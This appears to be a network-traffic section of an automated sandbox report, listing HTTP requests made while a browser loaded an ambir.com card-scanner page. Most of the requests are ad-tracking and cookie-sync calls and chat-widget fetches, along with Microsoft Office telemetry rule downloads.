      Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /377928.gif?partner_uid=16b1e49ed627599a8c527b960adbb83e HTTP/1.1Host: idsync.rlcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ul_cb/sync?dsp_id=44&user_id=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U HTTP/1.1Host: x.bidswitch.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tuuid=6881a2d9-ee78-482b-b070-9da6074a35fd; c=1732134521; tuuid_lu=1732134521
      Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1070729751/?random=1732134510409&cv=11&fst=1732132800000&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725z8833545045za201zb833545045&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Verify%20You%20Are%20Human&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dw9e1PdsyI7wuLd16IwKyz0AWKTwtXMslm9ozPf-QjAljjWhy&random=452684057&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jsclient-bucket5/storage.js?v=1732053196593 HTTP/1.1Host: static.olark.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://static.olark.com/jsclient-bucket5/storage.html?v=1732053196593Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cm/g/in HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
      Source: global trafficHTTP traffic detected: GET /attribution/trigger?fpc=d3ee31a855380a6a19350bbaa666e259&advertisable_eid=GXXT3DJJNNBKHGBC62RAND&conversion_type=PageView&conversion_value=0.0&currency=USC&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F HTTP/1.1Host: x.adroll.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513; receive-cookie-deprecation=1; ar_debug=1
      Source: global trafficHTTP traffic detected: GET /1000.gif?memo=CMiIFxIrCicIARDqIhogMTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2UQABoNCPqM-bkGEgUI6AcQAEIASgA HTTP/1.1Host: idsync.rlcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: rlas3=84+zswfUZ1mOtJDK3fy29mYLRpZqtEGKn32k1xKD0rE=; pxrc=CAA=
      Source: global trafficHTTP traffic detected: GET /rum?cm_dsp_id=105&external_user_id=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&expiration=1763670519&C=1 HTTP/1.1Host: dsum-sec.casalemedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CMID=Zz5GedHM6dcAABgsASJdbwAA; CMPS=3643; CMPRO=3643
      Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=tapad&ttd_tpi=1&ttd_puid=fca0ae6b-4903-4b6e-b6de-6aa8c515508a%252C%252C&gdpr=0&gdpr_consent= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /cm/o/out?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&advertisable=GXXT3DJJNNBKHGBC62RAND HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
      Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /ul_cb/sync?dsp_id=44&user_id=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U HTTP/1.1Host: x.bidswitch.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tuuid=6881a2d9-ee78-482b-b070-9da6074a35fd; c=1732134521; tuuid_lu=1732134523
      Source: global trafficHTTP traffic detected: GET /cm/outbrain/out?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&advertisable=GXXT3DJJNNBKHGBC62RAND HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
      Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /2.0/sites/7486-534-10-2045/visits?_callback=_olark_callback_9935ad46_0ccb_4c8b_b12b_ec5a5936bd74&_method=POST&_data=%7B%22conversation_id%22%3A%22tM65kxeIWm5Vcm4e542fr0UBjA8B6bor%22%2C%22cache%22%3A%220.13956010831456123%22%7D HTTP/1.1Host: api.olark.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cm/pubmatic/out?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&advertisable=GXXT3DJJNNBKHGBC62RAND HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
      Source: global trafficHTTP traffic detected: GET /api/sync?pid=5324&it=1&iv=34af0ad19cc48a98b32e3d372f84da6e5264e49867dca9a381770a8b503fefe6791426b5417dce21&_=2 HTTP/1.1Host: pippio.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jsclient-bucket5/storage.js?v=1732053196593 HTTP/1.1Host: static.olark.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cm/g/in HTTP/1.1Host: d.adroll.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll=16b1e49ed627599a8c527b960adbb83e-g_1732134524-a_1732134513; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-g_1732134524-a_1732134513
      Source: global trafficHTTP traffic detected: GET /cm/r/out?adroll_fpc=d3ee31a855380a6a19350bbaa666e259-1732134512472&flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&advertisable=GXXT3DJJNNBKHGBC62RAND HTTP/1.1Host: d.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; receive-cookie-deprecation=1; __adroll=16b1e49ed627599a8c527b960adbb83e-g_1732134524-a_1732134513; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-g_1732134524-a_1732134513
      Source: global trafficHTTP traffic detected: GET /track/cmb/generic?ttd_pid=tapad&ttd_tpi=1&ttd_puid=fca0ae6b-4903-4b6e-b6de-6aa8c515508a%252C%252C&gdpr=0&gdpr_consent= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TDID=fd66934f-cc4b-4a94-91f3-b309aaa3bde2; TDCPM=CAEYBSgCMgsItMXllJXrxD0QBTgB
      Source: global trafficHTTP traffic detected: GET /jsclient/styles/cryptic-capybara/theme.css HTTP/1.1Host: static.olark.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /w/1.0/sd?id=537103138&val=16b1e49ed627599a8c527b960adbb83e&gdpr=0&gdpr_consent= HTTP/1.1Host: us-u.openx.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /jsclient/sounds/olark-chimes.ogg HTTP/1.1Host: static.olark.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: audioReferer: https://ambir.com/Accept-Language: en-US,en;q=0.9Range: bytes=0-
      Source: global trafficHTTP traffic detected: GET /cookie-sync?p=adroll&uid=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&gdpr=0&gdpr_consent=&us_privacy=1--- HTTP/1.1Host: sync.outbrain.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /2.0/sites/7486-534-10-2045/visits?_callback=_olark_callback_9935ad46_0ccb_4c8b_b12b_ec5a5936bd74&_method=POST&_data=%7B%22conversation_id%22%3A%22tM65kxeIWm5Vcm4e542fr0UBjA8B6bor%22%2C%22cache%22%3A%220.13956010831456123%22%7D HTTP/1.1Host: api.olark.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /idsync/ex/receive?partner_id=1830&partner_device_id=fd66934f-cc4b-4a94-91f3-b309aaa3bde2&ttd_puid=fca0ae6b-4903-4b6e-b6de-6aa8c515508a%2C%2C HTTP/1.1Host: pixel.tapad.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TapAd_TS=1732134520945; TapAd_DID=fca0ae6b-4903-4b6e-b6de-6aa8c515508a; TapAd_3WAY_SYNCS=
      Source: global trafficHTTP traffic detected: GET /w/1.0/sd?cc=1&id=537103138&val=16b1e49ed627599a8c527b960adbb83e&gdpr=0&gdpr_consent= HTTP/1.1Host: us-u.openx.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=f09fa523-b3d3-4df5-bbbb-909001f691d2|1732134527
      Source: global trafficHTTP traffic detected: GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTMzMDYmdGw9MTI5NjAw&piggybackCookie=MTZiMWU0OWVkNjI3NTk5YThjNTI3Yjk2MGFkYmI4M2U&gdpr=0&gdpr_consent=BOOoKswOOoKswA2ABBENAkwAAAAXyACACYAIIA HTTP/1.1Host: image2.pubmatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ambir.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ambir.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ambir.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://ambir.com/ambir-card-scanners/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F537.36; sbjs_session=pgs%3D1%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F; isCompleted=true; _ga=GA1.1.59994235.1732134501; 